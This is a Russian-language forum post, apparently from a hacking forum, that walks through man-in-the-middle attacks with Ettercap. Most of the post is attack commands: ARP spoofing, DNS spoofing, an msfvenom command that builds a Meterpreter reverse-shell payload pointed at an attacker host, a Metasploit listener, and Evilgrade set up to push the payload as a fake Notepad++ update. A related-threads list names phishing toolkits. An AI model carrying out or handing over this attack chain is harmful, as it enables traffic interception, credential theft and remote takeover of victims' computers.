«Атаки класса man-in- the-middle с помощью Ettercap, »

B

Bad-Dag

Original poster
Здравствуйте, в этой статье мы познакомимся с такими инструментом как: Ettercap,

Ettercap – сниффер и не только

Еttercap — инструмент для анализа безопасности компьютерной сети, обладающий большим количеством
разнообразных возможностей, но ставший особо популярным за умение выполнять атаку ARP-spoofing.

Так же, умеет анализировать трафик и извлекать пароли различных протоколов - от http и ftp до imap и nfs.
Может работать в трех режимах — консольном/текстовом (-T), псевдографике/ncurses (-C) или в графическом
варианте (-G).


Пример проведения атаки типа ARP spoofing c использованием Ettercap:


ettercap -T -q -M arp:remote -L log /IP_gateway/ /IP_windowsClient/


DNS Spoofing с использованием Ettercap и дальнейшая эксплуатация жертвы с помощью фреймворка Evilgrade


1) Вначале необходимо проверить и внести правки в файл выбранного модуля Evilgrade
nano /usr/share/isr-evilgrade/modules/notepadplus.pm


2) Добавить необходимую A-запись в модуль Ettercap, отвечающий за атаку типа dns spoofing
nano /etc/ettercap/etter.dns


3) Создать пейлоад, используя возможности фреймворка metasploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_IP LPORT=8765 -f exe > /tmp/agent.exe


4) Запустить слушатель, готовый принимать подключения от пейлоада
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST attacker_IP;
set LPORT 8765; exploit -j"


5) Сконфигурировать и запустить Evilgrade
evilgrade> configure notepadplus
evilgrade> show options
evilgrade> set agent /tmp/agent.exe
evilgrade> start


6) Последний шаг — запуск атаки dns spoofing с помощью ettercap
ettercap -T -q -M arp:remote -P dns_spoof /IP_gateway// /IP_windowsClient//

Всем спасибо за внимание.
 
Название темы
Автор Заголовок Раздел Ответы Дата
B Атаки класса man-in- the-middle часть 3 с помощью MITMf Уязвимости и взлом 0
B Атаки класса man-in- the-middle часть 2 с помощью Responder Уязвимости и взлом 0
S Атаки: 800 000 россиян стали жертвами банковского Android-ботнета Новости в сети 1
Admin Xakep #244. Атаки по сторонним каналам. Полезные статьи 0
Support81 UNC4841 — настоящие спецагенты или просто хакеры высокого класса? Новости в сети 0
S Заработок для работяг 9 класса Способы заработка 7
S Дешевая активация Инстаграм и других соц.сетей в sms-man.ru Ищу работу. Предлагаю свои услуги. 0
D SMS-MAN.RU - новый сервис для приёма смс Ищу работу. Предлагаю свои услуги. 0
S Sms-man.ru - лучший сервис СМС активаций Свободное общение и флейм 1
АнАлЬнАя ЧуПаКаБрА INLINE Wood-Man.biz Проекты Private Keeper 0
G Skeleton , Blackeye , Phisher-man - Инструменты для фишинговых атак Полезные статьи 0

Название темы